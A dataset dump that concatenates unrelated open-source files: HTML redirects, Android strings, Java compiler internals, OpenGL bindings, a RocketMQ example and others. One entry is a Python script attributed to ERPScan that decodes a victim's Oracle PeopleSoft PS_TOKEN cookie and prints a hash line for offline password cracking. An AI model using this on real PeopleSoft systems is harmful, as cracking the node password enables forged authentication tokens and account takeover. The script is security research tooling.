text
stringlengths 2
99.9k
| meta
dict |
---|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="refresh" content="0;URL=../../libc/type.in_port_t.html">
</head>
<body>
<p>Redirecting to <a href="../../libc/type.in_port_t.html">../../libc/type.in_port_t.html</a>...</p>
<script>location.replace("../../libc/type.in_port_t.html" + location.search + location.hash);</script>
</body>
</html> | {
"pile_set_name": "Github"
} |
#!/usr/bin/python
import base64
import hashlib
import argparse
import zlib
import sys
# Use "generate.py from https://erpscan.com/wp-content/uploads/tools/ERPScan-tockenchpoken.zip
# to generate sample PS_TOKEN cookies.
print "Based on tokenchpoken v0.5 beta's parse.py file"
print 'Oracle PS_TOKEN cracker. Token parser'
print
print 'Alexey Tyurin - a.tyurin at erpscan.com'
print 'ERPScan Research Group - http://www.erpscan.com'
print
parser = argparse.ArgumentParser()
parser.add_argument('-c', action='store', dest='cookie', required=True,
help='Set a victim\'s PS_TOKEN cookie for parsing')
args = parser.parse_args()
input = args.cookie
full_str = base64.b64decode(input)
sha_mac = full_str[44:64].encode('hex')
inflate_data = full_str[76:]
data = zlib.decompress(inflate_data)
# parsing of compressed data
data_hash = hashlib.sha1(data).hexdigest()
user_length = data[20]
loc = 21
user = data[loc:loc + int(user_length.encode('hex'), 16)].replace("\x00", "")
# python generate.py -e 0 -u PS -l ENG -p "" -n PSFT_HR -d 2015-07-01-08.06.46
if data_hash == sha_mac:
print "%s: there is no password for the attacking node!" % user
else:
# print hash
sys.stdout.write("%s:$dynamic_1600$%s$HEX$%s\n" % (user, sha_mac,
data.encode("hex")))
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
/* //device/apps/common/assets/res/any/strings.xml
**
** Copyright 2006, The Android Open Source Project
**
** Licensed under the Apache License, Version 2.0 (the "License");
** you may not use this file except in compliance with the License.
** You may obtain a copy of the License at
**
** http://www.apache.org/licenses/LICENSE-2.0
**
** Unless required by applicable law or agreed to in writing, software
** distributed under the License is distributed on an "AS IS" BASIS,
** WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
** See the License for the specific language governing permissions and
** limitations under the License.
*/
-->
<resources>
<string msgid="735082772341716043" name="fingerprint_acquired_partial">"Odcisk palca został odczytany tylko częściowo. Spróbuj ponownie."</string>
<string msgid="4596546021310923214" name="fingerprint_acquired_insufficient">"Nie udało się przetworzyć odcisku palca. Spróbuj ponownie."</string>
<string msgid="1087209702421076105" name="fingerprint_acquired_imager_dirty">"Czytnik linii papilarnych jest zabrudzony. Wyczyść go i spróbuj ponownie."</string>
<string msgid="6470642383109155969" name="fingerprint_acquired_too_fast">"Palec został podniesiony zbyt wcześnie. Spróbuj jeszcze raz."</string>
<string msgid="59250885689661653" name="fingerprint_acquired_too_slow">"Palec został obrócony zbyt wolno. Spróbuj ponownie."</string>
<string msgid="7955921658939936596" name="fingerprint_error_hw_not_available">"Czytnik linii papilarnych nie jest dostępny."</string>
<string msgid="1055819001126053318" name="fingerprint_error_no_space">"Nie można zapisać odcisku palca. Usuń istniejący odcisk palca."</string>
<string msgid="3927186043737732875" name="fingerprint_error_timeout">"Osiągnięto limit czasu odczytu linii papilarnych. Spróbuj ponownie."</string>
<string msgid="4402024612660774395" name="fingerprint_error_canceled">"Odczyt odcisku palca został anulowany."</string>
<string msgid="5536934748136933450" name="fingerprint_error_lockout">"Zbyt wiele prób. Spróbuj ponownie później."</string>
<string msgid="6107816084103552441" name="fingerprint_error_unable_to_process">"Spróbuj ponownie."</string>
<string msgid="4516019619850763049" name="fingerprints">"Odciski cyfrowe:"</string>
<string name="fingerprint_not_recognized" msgid="2690661881608146617">"Nie rozpoznano odcisku palca."</string>
</resources> | {
"pile_set_name": "Github"
} |
{
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
<HTML>
<HEAD>
<meta charset="UTF-8">
<title>CustomMessage.message - tock</title>
<link rel="stylesheet" href="../../../style.css">
</HEAD>
<BODY>
<a href="../../index.html">tock</a> / <a href="../index.html">ai.tock.bot.api.model.message.bot</a> / <a href="index.html">CustomMessage</a> / <a href="./message.html">message</a><br/>
<br/>
<h1>message</h1>
<a name="ai.tock.bot.api.model.message.bot.CustomMessage$message"></a>
<code><span class="keyword">val </span><span class="identifier">message</span><span class="symbol">: </span><a href="../../ai.tock.shared.jackson/-constrained-value-wrapper/index.html"><span class="identifier">ConstrainedValueWrapper</span></a><span class="symbol"><</span><span class="keyword">out</span> <a href="../../ai.tock.bot.connector/-connector-message/index.html"><span class="identifier">ConnectorMessage</span></a><span class="symbol">></span></code> <a href="https://github.com/theopenconversationkit/tock/blob/master/bot/api/model/src/main/kotlin/message/bot/CustomMessage.kt#L23">(source)</a>
</BODY>
</HTML>
| {
"pile_set_name": "Github"
} |
import DS from "ember-data";
import cardColor from "../utils/card-color";
export default DS.Model.extend({
name: DS.attr('string'),
icon: DS.attr('string'),
policy: DS.attr('number'),
ports: DS.attr(),
type: DS.attr('string'),
cardColor: function() {
return cardColor();
}.property(),
displayPorts: function() {
var portsStrings = [];
this.get('ports').forEach(function(i) {
portsStrings.push(i[1]+" ("+i[0]+")");
});
return portsStrings.join(", ");
}.property('ports'),
policyDisplayIcon: function() {
var policy = this.get('policy');
if (policy === 0) {
return "minus circle";
} else if (policy === 1) {
return "home";
} else if (policy === 2) {
return "check circle";
} else {
return "";
}
}.property('policy'),
policyDisplayText: function() {
var policy = this.get('policy');
if (policy === 0) {
return "Deny All Connections";
} else if (policy === 1) {
return "Local Networks Only";
} else if (policy === 2) {
return "Allow All Connections";
} else {
return "Unknown Policy";
}
}.property('policy'),
policyDisplayClass: function() {
var policy = this.get('policy');
if (policy === 0) {
return "text red";
} else if (policy === 2) {
return "text green";
} else {
return "text black";
}
}.property('policy'),
notWideOpen: function() {
return this.get('policy') !== 2;
}.property('policy'),
notLocal: function() {
return this.get('policy') !== 1;
}.property('policy'),
notDenied: function() {
return this.get('policy') !== 0;
}.property('policy'),
canDeny: function() {
return this.get('type') !== "arkos";
}.property('type'),
isCustomPolicy: function() {
return this.get('type') === "custom";
}.property('type'),
isReady: DS.attr('boolean', {defaultValue: false})
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2007 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package external.com.android.dx.rop.code;
import external.com.android.dx.rop.type.StdTypeList;
import external.com.android.dx.rop.type.Type;
import external.com.android.dx.rop.type.TypeList;
import external.com.android.dx.util.ToHuman;
/**
* A register-based instruction. An instruction is the combination of
* an opcode (which specifies operation and source/result types), a
* list of actual sources and result registers/values, and additional
* information.
*/
public abstract class Insn implements ToHuman {
/** {@code non-null;} opcode */
private final Rop opcode;
/** {@code non-null;} source position */
private final SourcePosition position;
/** {@code null-ok;} spec for the result of this instruction, if any */
private final RegisterSpec result;
/** {@code non-null;} specs for all the sources of this instruction */
private final RegisterSpecList sources;
/**
* Constructs an instance.
*
* @param opcode {@code non-null;} the opcode
* @param position {@code non-null;} source position
* @param result {@code null-ok;} spec for the result, if any
* @param sources {@code non-null;} specs for all the sources
*/
public Insn(Rop opcode, SourcePosition position, RegisterSpec result,
RegisterSpecList sources) {
if (opcode == null) {
throw new NullPointerException("opcode == null");
}
if (position == null) {
throw new NullPointerException("position == null");
}
if (sources == null) {
throw new NullPointerException("sources == null");
}
this.opcode = opcode;
this.position = position;
this.result = result;
this.sources = sources;
}
/**
* {@inheritDoc}
*
* Instances of this class compare by identity. That is,
* {@code x.equals(y)} is only true if {@code x == y}.
*/
@Override
public final boolean equals(Object other) {
return (this == other);
}
/**
* {@inheritDoc}
*
* This implementation returns the identity hashcode of this
* instance. This is proper, since instances of this class compare
* by identity (see {@link #equals}).
*/
@Override
public final int hashCode() {
return System.identityHashCode(this);
}
/** {@inheritDoc} */
@Override
public String toString() {
return toStringWithInline(getInlineString());
}
/**
* Gets a human-oriented (and slightly lossy) string for this instance.
*
* @return {@code non-null;} the human string form
*/
@Override
public String toHuman() {
return toHumanWithInline(getInlineString());
}
/**
* Gets an "inline" string portion for toHuman(), if available. This
* is the portion that appears after the Rop opcode
*
* @return {@code null-ok;} if non-null, the inline text for toHuman()
*/
public String getInlineString() {
return null;
}
/**
* Gets the opcode.
*
* @return {@code non-null;} the opcode
*/
public final Rop getOpcode() {
return opcode;
}
/**
* Gets the source position.
*
* @return {@code non-null;} the source position
*/
public final SourcePosition getPosition() {
return position;
}
/**
* Gets the result spec, if any. A return value of {@code null}
* means this instruction returns nothing.
*
* @return {@code null-ok;} the result spec, if any
*/
public final RegisterSpec getResult() {
return result;
}
/**
* Gets the spec of a local variable assignment that occurs at this
* instruction, or null if no local variable assignment occurs. This
* may be the result register, or for {@code mark-local} insns
* it may be the source.
*
* @return {@code null-ok;} a named register spec or null
*/
public final RegisterSpec getLocalAssignment() {
RegisterSpec assignment;
if (opcode.getOpcode() == RegOps.MARK_LOCAL) {
assignment = sources.get(0);
} else {
assignment = result;
}
if (assignment == null) {
return null;
}
LocalItem localItem = assignment.getLocalItem();
if (localItem == null) {
return null;
}
return assignment;
}
/**
* Gets the source specs.
*
* @return {@code non-null;} the source specs
*/
public final RegisterSpecList getSources() {
return sources;
}
/**
* Gets whether this instruction can possibly throw an exception. This
* is just a convenient wrapper for {@code getOpcode().canThrow()}.
*
* @return {@code true} iff this instruction can possibly throw
*/
public final boolean canThrow() {
return opcode.canThrow();
}
/**
* Gets the list of possibly-caught exceptions. This returns {@link
* StdTypeList#EMPTY} if this instruction has no handlers,
* which can be <i>either</i> if this instruction can't possibly
* throw or if it merely doesn't handle any of its possible
* exceptions. To determine whether this instruction can throw,
* use {@link #canThrow}.
*
* @return {@code non-null;} the catches list
*/
public abstract TypeList getCatches();
/**
* Calls the appropriate method on the given visitor, depending on the
* class of this instance. Subclasses must override this.
*
* @param visitor {@code non-null;} the visitor to call on
*/
public abstract void accept(Visitor visitor);
/**
* Returns an instance that is just like this one, except that it
* has a catch list with the given item appended to the end. This
* method throws an exception if this instance can't possibly
* throw. To determine whether this instruction can throw, use
* {@link #canThrow}.
*
* @param type {@code non-null;} type to append to the catch list
* @return {@code non-null;} an appropriately-constructed instance
*/
public abstract Insn withAddedCatch(Type type);
/**
* Returns an instance that is just like this one, except that all
* register references have been offset by the given delta.
*
* @param delta the amount to offset register references by
* @return {@code non-null;} an appropriately-constructed instance
*/
public abstract Insn withRegisterOffset(int delta);
/**
* Returns an instance that is just like this one, except that, if
* possible, the insn is converted into a version in which a source
* (if it is a constant) is represented directly rather than as a
* register reference. {@code this} is returned in cases where the
* translation is not possible.
*
* @return {@code non-null;} an appropriately-constructed instance
*/
public Insn withSourceLiteral() {
return this;
}
/**
* Returns an exact copy of this Insn
*
* @return {@code non-null;} an appropriately-constructed instance
*/
public Insn copy() {
return withRegisterOffset(0);
}
/**
* Compares, handling nulls safely
*
* @param a first object
* @param b second object
* @return true if they're equal or both null.
*/
private static boolean equalsHandleNulls (Object a, Object b) {
return (a == b) || ((a != null) && a.equals(b));
}
/**
* Compares Insn contents, since {@code Insn.equals()} is defined
* to be an identity compare. Insn's are {@code contentEquals()}
* if they have the same opcode, registers, source position, and other
* metadata.
*
* @return true in the case described above
*/
public boolean contentEquals(Insn b) {
return opcode == b.getOpcode()
&& position.equals(b.getPosition())
&& (getClass() == b.getClass())
&& equalsHandleNulls(result, b.getResult())
&& equalsHandleNulls(sources, b.getSources())
&& StdTypeList.equalContents(getCatches(), b.getCatches());
}
/**
* Returns an instance that is just like this one, except
* with new result and source registers.
*
* @param result {@code null-ok;} new result register
* @param sources {@code non-null;} new sources registers
* @return {@code non-null;} an appropriately-constructed instance
*/
public abstract Insn withNewRegisters(RegisterSpec result,
RegisterSpecList sources);
/**
* Returns the string form of this instance, with the given bit added in
* the standard location for an inline argument.
*
* @param extra {@code null-ok;} the inline argument string
* @return {@code non-null;} the string form
*/
protected final String toStringWithInline(String extra) {
StringBuilder sb = new StringBuilder(80);
sb.append("Insn{");
sb.append(position);
sb.append(' ');
sb.append(opcode);
if (extra != null) {
sb.append(' ');
sb.append(extra);
}
sb.append(" :: ");
if (result != null) {
sb.append(result);
sb.append(" <- ");
}
sb.append(sources);
sb.append('}');
return sb.toString();
}
/**
* Returns the human string form of this instance, with the given
* bit added in the standard location for an inline argument.
*
* @param extra {@code null-ok;} the inline argument string
* @return {@code non-null;} the human string form
*/
protected final String toHumanWithInline(String extra) {
StringBuilder sb = new StringBuilder(80);
sb.append(position);
sb.append(": ");
sb.append(opcode.getNickname());
if (extra != null) {
sb.append("(");
sb.append(extra);
sb.append(")");
}
if (result == null) {
sb.append(" .");
} else {
sb.append(" ");
sb.append(result.toHuman());
}
sb.append(" <-");
int sz = sources.size();
if (sz == 0) {
sb.append(" .");
} else {
for (int i = 0; i < sz; i++) {
sb.append(" ");
sb.append(sources.get(i).toHuman());
}
}
return sb.toString();
}
/**
* Visitor interface for this (outer) class.
*/
public static interface Visitor {
/**
* Visits a {@link PlainInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitPlainInsn(PlainInsn insn);
/**
* Visits a {@link PlainCstInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitPlainCstInsn(PlainCstInsn insn);
/**
* Visits a {@link SwitchInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitSwitchInsn(SwitchInsn insn);
/**
* Visits a {@link ThrowingCstInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitThrowingCstInsn(ThrowingCstInsn insn);
/**
* Visits a {@link ThrowingInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitThrowingInsn(ThrowingInsn insn);
/**
* Visits a {@link FillArrayDataInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitFillArrayDataInsn(FillArrayDataInsn insn);
/**
* Visits a {@link InvokePolymorphicInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitInvokePolymorphicInsn(InvokePolymorphicInsn insn);
}
/**
* Base implementation of {@link Visitor}, which has empty method
* bodies for all methods.
*/
public static class BaseVisitor implements Visitor {
/** {@inheritDoc} */
@Override
public void visitPlainInsn(PlainInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitPlainCstInsn(PlainCstInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitSwitchInsn(SwitchInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitThrowingCstInsn(ThrowingCstInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitThrowingInsn(ThrowingInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitFillArrayDataInsn(FillArrayDataInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitInvokePolymorphicInsn(InvokePolymorphicInsn insn) {
// This space intentionally left blank.
}
}
}
| {
"pile_set_name": "Github"
} |
{
"name": "objc-codegenutils",
"full_name": "objc-codegenutils",
"oldname": null,
"aliases": [
],
"versioned_formulae": [
],
"desc": "Three small tools to help work with XCode",
"license": "Apache-2.0",
"homepage": "https://github.com/square/objc-codegenutils",
"versions": {
"stable": "1.0",
"head": "HEAD",
"bottle": true
},
"urls": {
"stable": {
"url": "https://github.com/square/objc-codegenutils/archive/v1.0.tar.gz",
"tag": null,
"revision": null
}
},
"revision": 0,
"version_scheme": 0,
"bottle": {
"stable": {
"rebuild": 0,
"cellar": ":any_skip_relocation",
"prefix": "/home/linuxbrew/.linuxbrew",
"root_url": "https://linuxbrew.bintray.com/bottles",
"files": {
"catalina": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.catalina.bottle.tar.gz",
"sha256": "24745ae53d47e15598835ee0538c3f121c48b31b21902b1fd3fab0a8c9886543"
},
"mojave": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.mojave.bottle.tar.gz",
"sha256": "7a10354a20ef417eeb521c983f4714be063b68e6d74bec7ddf6f72b99d3cbfbe"
},
"high_sierra": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.high_sierra.bottle.tar.gz",
"sha256": "118c03e858a60fa17c71fbc84fb5a8b9c5f778a0c68531e3df576e1d85d9c91a"
},
"sierra": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.sierra.bottle.tar.gz",
"sha256": "d7b3d3d26970add3af78b0820f3ef8b5e0290f1b2114f5bf06acddcd8d6bdb34"
},
"el_capitan": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.el_capitan.bottle.tar.gz",
"sha256": "d7b945db595b07ee5677902586e01002ba555affdcae366f1fcbe919a6013772"
},
"mavericks": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.mavericks.bottle.tar.gz",
"sha256": "46d389e6ec12462dfbdd97822ce7c6e8156bbe9fac7a3baf04c20cb1991d9f75"
}
}
}
},
"keg_only": false,
"bottle_disabled": false,
"options": [
],
"build_dependencies": [
],
"dependencies": [
],
"recommended_dependencies": [
],
"optional_dependencies": [
],
"uses_from_macos": [
],
"requirements": [
],
"conflicts_with": [
],
"caveats": null,
"installed": [
],
"linked_keg": null,
"pinned": false,
"outdated": false,
"deprecated": false,
"disabled": false
}
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/or.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl {
namespace aux {
template< bool C_, typename T1, typename T2, typename T3, typename T4 >
struct or_impl
: true_
{
};
template< typename T1, typename T2, typename T3, typename T4 >
struct or_impl< false,T1,T2,T3,T4 >
: or_impl<
BOOST_MPL_AUX_NESTED_TYPE_WKND(T1)::value
, T2, T3, T4
, false_
>
{
};
template<>
struct or_impl<
false
, false_, false_, false_, false_
>
: false_
{
};
} // namespace aux
template<
typename BOOST_MPL_AUX_NA_PARAM(T1)
, typename BOOST_MPL_AUX_NA_PARAM(T2)
, typename T3 = false_, typename T4 = false_, typename T5 = false_
>
struct or_
: aux::or_impl<
BOOST_MPL_AUX_NESTED_TYPE_WKND(T1)::value
, T2, T3, T4, T5
>
{
BOOST_MPL_AUX_LAMBDA_SUPPORT(
5
, or_
, ( T1, T2, T3, T4, T5)
)
};
BOOST_MPL_AUX_NA_SPEC2(
2
, 5
, or_
)
}}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.rocketmq.example.ordermessage;
import java.util.List;
import java.util.concurrent.atomic.AtomicLong;
import org.apache.rocketmq.client.consumer.DefaultMQPushConsumer;
import org.apache.rocketmq.client.consumer.listener.ConsumeOrderlyContext;
import org.apache.rocketmq.client.consumer.listener.ConsumeOrderlyStatus;
import org.apache.rocketmq.client.consumer.listener.MessageListenerOrderly;
import org.apache.rocketmq.client.exception.MQClientException;
import org.apache.rocketmq.common.consumer.ConsumeFromWhere;
import org.apache.rocketmq.common.message.MessageExt;
public class Consumer {
public static void main(String[] args) throws MQClientException {
DefaultMQPushConsumer consumer = new DefaultMQPushConsumer("please_rename_unique_group_name_3");
consumer.setConsumeFromWhere(ConsumeFromWhere.CONSUME_FROM_FIRST_OFFSET);
consumer.subscribe("TopicTest", "TagA || TagC || TagD");
consumer.registerMessageListener(new MessageListenerOrderly() {
AtomicLong consumeTimes = new AtomicLong(0);
@Override
public ConsumeOrderlyStatus consumeMessage(List<MessageExt> msgs, ConsumeOrderlyContext context) {
context.setAutoCommit(true);
System.out.printf("%s Receive New Messages: %s %n", Thread.currentThread().getName(), msgs);
this.consumeTimes.incrementAndGet();
if ((this.consumeTimes.get() % 2) == 0) {
return ConsumeOrderlyStatus.SUCCESS;
} else if ((this.consumeTimes.get() % 3) == 0) {
return ConsumeOrderlyStatus.ROLLBACK;
} else if ((this.consumeTimes.get() % 4) == 0) {
return ConsumeOrderlyStatus.COMMIT;
} else if ((this.consumeTimes.get() % 5) == 0) {
context.setSuspendCurrentQueueTimeMillis(3000);
return ConsumeOrderlyStatus.SUSPEND_CURRENT_QUEUE_A_MOMENT;
}
return ConsumeOrderlyStatus.SUCCESS;
}
});
consumer.start();
System.out.printf("Consumer Started.%n");
}
}
| {
"pile_set_name": "Github"
} |
// MIT License
//
// Copyright (c) 2009-2017 Luca Piccioni
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
//
// This file is automatically generated
#pragma warning disable 649, 1572, 1573
// ReSharper disable RedundantUsingDirective
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
using Khronos;
// ReSharper disable CheckNamespace
// ReSharper disable InconsistentNaming
// ReSharper disable JoinDeclarationAndInitializer
namespace OpenGL
{
public partial class Gl
{
/// <summary>
/// [GL] Value of GL_TEXTURE_SPARSE_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int TEXTURE_SPARSE_ARB = 0x91A6;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_INDEX_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int VIRTUAL_PAGE_SIZE_INDEX_ARB = 0x91A7;
/// <summary>
/// [GL] Value of GL_NUM_SPARSE_LEVELS_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int NUM_SPARSE_LEVELS_ARB = 0x91AA;
/// <summary>
/// [GL] Value of GL_NUM_VIRTUAL_PAGE_SIZES_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int NUM_VIRTUAL_PAGE_SIZES_ARB = 0x91A8;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_X_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int VIRTUAL_PAGE_SIZE_X_ARB = 0x9195;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_Y_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int VIRTUAL_PAGE_SIZE_Y_ARB = 0x9196;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_Z_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int VIRTUAL_PAGE_SIZE_Z_ARB = 0x9197;
/// <summary>
/// [GL] Value of GL_MAX_SPARSE_TEXTURE_SIZE_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int MAX_SPARSE_TEXTURE_SIZE_ARB = 0x9198;
/// <summary>
/// [GL] Value of GL_MAX_SPARSE_3D_TEXTURE_SIZE_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int MAX_SPARSE_3D_TEXTURE_SIZE_ARB = 0x9199;
/// <summary>
/// [GL] Value of GL_SPARSE_TEXTURE_FULL_ARRAY_CUBE_MIPMAPS_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int SPARSE_TEXTURE_FULL_ARRAY_CUBE_MIPMAPS_ARB = 0x91A9;
/// <summary>
/// [GL] glTexPageCommitmentARB: Binding for glTexPageCommitmentARB.
/// </summary>
/// <param name="target">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="level">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="xoffset">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="yoffset">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="zoffset">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="width">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="height">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="depth">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="commit">
/// A <see cref="T:bool"/>.
/// </param>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public static void TexPageCommitmentARB(int target, int level, int xoffset, int yoffset, int zoffset, int width, int height, int depth, bool commit)
{
Debug.Assert(Delegates.pglTexPageCommitmentARB != null, "pglTexPageCommitmentARB not implemented");
Delegates.pglTexPageCommitmentARB(target, level, xoffset, yoffset, zoffset, width, height, depth, commit);
LogCommand("glTexPageCommitmentARB", null, target, level, xoffset, yoffset, zoffset, width, height, depth, commit );
DebugCheckErrors(null);
}
internal static unsafe partial class Delegates
{
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[SuppressUnmanagedCodeSecurity]
internal delegate void glTexPageCommitmentARB(int target, int level, int xoffset, int yoffset, int zoffset, int width, int height, int depth, [MarshalAs(UnmanagedType.I1)] bool commit);
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2", EntryPoint = "glTexPageCommitmentEXT")]
[ThreadStatic]
internal static glTexPageCommitmentARB pglTexPageCommitmentARB;
}
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Orientation Test using classnames</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"/>
<link rel="stylesheet" href="../iui/iui.css" type="text/css" />
<link rel="stylesheet" title="Default" href="../iui/t/default/default-theme.css" type="text/css"/>
<script type="application/x-javascript" src="../iui/iui.js"></script>
<style type="text/css">
/* CSS to add ": True" or ": False" after headings to indicate orientation */
/* These rules look for a body class of either "landscape" or "portrait" */
div.panel > h2:after { content: ": False"; }
div.panel > h2.neither:after { content: ": True"; }
body.landscape > div.panel > h2.landscape:after { content: ": True"; }
body.landscape > div.panel > h2.neither:after { content: ": False"; }
body.portrait> div.panel > h2.portrait:after { content: ": True"; }
body.portrait > div.panel > h2.neither:after { content: ": False"; }
</style>
</head>
<body>
<div class="toolbar">
<h1 id="pageTitle"></h1>
</div>
<div id="main" title="Orient @class" class="panel" selected="true">
<h2 class="portrait">Portrait</h2>
<h2 class="landscape">Landscape</h2>
<h2 class="neither">Unknown</h2>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
<?php
/**
* This file is part of phpDocumentor.
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*
* @copyright 2010-2015 Mike van Riel<[email protected]>
* @license http://www.opensource.org/licenses/mit-license.php MIT
* @link http://phpdoc.org
*/
namespace phpDocumentor\Reflection\Types;
use ArrayIterator;
use IteratorAggregate;
use phpDocumentor\Reflection\Type;
/**
